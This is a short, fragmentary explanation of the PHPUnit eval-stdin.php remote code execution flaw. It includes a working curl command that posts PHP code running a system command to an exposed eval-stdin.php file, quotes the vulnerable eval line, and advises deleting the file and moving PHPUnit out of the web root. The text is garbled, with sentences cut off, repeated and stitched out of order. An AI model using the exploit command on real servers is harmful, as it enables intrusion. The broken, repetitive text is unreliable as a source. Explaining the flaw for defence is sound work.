If eval-stdin.php is accessible via HTTP, an attacker does not need to navigate to the page in a browser. They use a command-line tool like cURL to send malicious code.
Delete the file and move PHPUnit out of the web root. If eval-stdin
curl -d "<?php system('id'); ?>" https://yoursite.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php If eval-stdin.php is accessible via HTTP
When PHPUnit needs to run a test method in a separate PHP process: If eval-stdin
The vulnerability stemmed from one dangerous line of code: eval('?> ' . file_get_contents('php://input'));